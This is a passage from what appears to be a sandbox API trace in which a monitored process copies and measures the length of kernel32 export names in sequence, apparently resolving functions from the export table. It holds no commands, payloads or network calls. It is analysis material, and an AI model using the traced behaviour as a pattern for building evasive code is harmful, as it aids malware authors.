lstrlenA (lpString="ADDATOMW") returned 8 [0086.758] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0086.758] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0086.758] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0086.758] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0086.758] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0086.758] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0086.758] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0086.758] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0086.758] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0086.758] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0086.758] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0086.758] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0086.758] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0086.758] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0086.758] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0086.758] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0086.758] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0086.758] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0086.758] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0086.758] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0086.758] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0086.758] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0086.758] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0086.758] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0086.758] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0086.758] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0086.758] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0086.758] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0086.758] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0086.758] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0086.758] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0086.759] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0086.759] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0086.759] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0086.759] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0086.759] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0086.759] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0086.759] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0086.759] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0086.759] lstrlenA (lpString="BACKUPREAD") returned 10 [0086.759] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0086.759] lstrlenA (lpString="BACKUPSEEK") returned 10 [0086.759] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0086.759] lstrlenA (lpString="BACKUPWRITE") returned 11 [0086.759] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0086.759] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0086.759] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0086.759] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0086.759] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0086.759] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0086.759] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0086.759] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0086.759] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0086.759] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0086.759] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0086.759] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0086.759] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0086.759] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0086.759] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0086.759] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0086.759] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0086.759] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0086.759] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0086.759] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0086.759] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0086.759] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0086.759] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0086.760] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0086.760] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0086.760] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0086.760] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0086.760] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0086.760] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0086.760] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0086.760] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0086.760] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0086.760] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0086.760] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0086.760] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0086.760] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0086.760] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0086.760] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0086.760] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0086.760] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0086.760] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0086.760] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0086.760] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0086.760] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0086.760] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0086.760] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0086.760] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0086.760] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0086.760] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0086.760] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0086.760] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0086.760] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0086.760] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0086.760] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0086.760] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0086.760] lstrlenA (lpString="BEEP") returned 4 [0086.760] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0086.760] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0086.760] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0086.761] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0086.761] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0086.761] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0086.761] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0086.761] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0086.761] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0086.761] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0086.761] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0086.761] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0086.761] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0086.761] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0086.761] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0086.761] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0086.761] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0086.761] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0086.761] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0086.761] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0086.761] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0086.761] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0086.761] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0086.761] lstrlenA (lpString="CANCELIO") returned 8 [0086.761] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0086.761] lstrlenA (lpString="CANCELIOEX") returned 10 [0086.761] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0086.761] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0086.761] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0086.761] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0086.761] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0086.761] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0086.761] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0086.761] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0086.761] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0086.761] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0086.761] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0086.761] lstrlenA (lpString="CHECKELEVATION") returned 14 [0086.761] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0086.762] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0086.762] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0086.762] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0086.762] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0086.762] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0086.762] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0086.762] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0086.762] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0086.762] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0086.762] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0086.762] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0086.762] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0086.762] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0086.762] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0086.762] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0086.762] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0086.762] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0086.762] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0086.762] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0086.762] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0086.762] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0086.762] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0086.762] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0086.762] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0086.762] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0086.762] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0086.762] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0086.762] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0086.762] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0086.762] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0086.762] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0086.762] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0086.762] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0086.762] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0086.762] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0086.762] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0086.763] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0086.763] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0086.763] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0086.763] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0086.763] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0086.763] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0086.763] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0086.763] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0086.763] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0086.763] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0086.763] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0086.763] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0086.763] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0086.763] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0086.763] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0086.763] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0086.763] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0086.763] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0086.763] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0086.763] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0086.763] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0086.763] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0086.763] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0086.763] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0086.763] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0086.763] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0086.763] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0086.763] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0086.763] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0086.763] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0086.763] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0086.763] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0086.763] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0086.763] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0086.764] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0086.764] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0086.764] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0086.764] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0086.764] lstrlenA (lpString="COPYCONTEXT") returned 11 [0086.764] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0086.764] lstrlenA (lpString="COPYFILEA") returned 9 [0086.764] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0086.764] lstrlenA (lpString="COPYFILEEXA") returned 11 [0086.764] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0086.764] lstrlenA (lpString="COPYFILEEXW") returned 11 [0086.764] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0086.764] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0086.764] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0086.764] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0086.764] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0086.764] lstrlenA (lpString="COPYFILEW") returned 9 [0086.764] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0086.764] lstrlenA (lpString="COPYLZFILE") returned 10 [0086.764] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0086.764] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0086.764] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0086.764] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0086.764] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0086.764] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0086.764] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0086.764] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0086.764] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0086.764] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0086.764] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0086.764] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0086.764] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0086.765] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0086.765] lstrcpyA (in: 